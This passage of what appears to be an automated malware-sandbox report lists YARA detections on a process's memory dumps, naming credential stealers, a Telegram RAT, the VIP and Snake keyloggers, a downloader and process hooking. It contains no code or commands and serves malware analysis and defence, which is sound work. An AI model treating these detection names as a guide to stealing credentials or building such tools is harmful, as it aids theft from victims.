                                                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.33976502729.0000000007FE0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000008.00000002.33976502729.0000000007FE0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000008.00000002.33976502729.0000000007FE0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000008.00000002.33976502729.0000000007FE0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000008.00000002.33976502729.0000000007FE0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                  • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000008.00000002.33976502729.0000000007FE0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                                                  • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000008.00000002.33976502729.0000000007FE0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.33970405843.000000000580D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.33968896009.0000000003374000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000008.00000002.33968896009.0000000003374000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000008.00000002.33968896009.0000000003374000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000008.00000002.33968896009.0000000003374000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000003.31559183380.0000000003259000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000008.00000003.31559183380.0000000003259000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000008.00000003.31559183380.0000000003259000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000008.00000003.31559183380.0000000003259000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000008.00000003.31559183380.0000000003259000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                  • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000008.00000003.31559183380.0000000003259000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                                                  • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000008.00000003.31559183380.0000000003259000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  No disassembly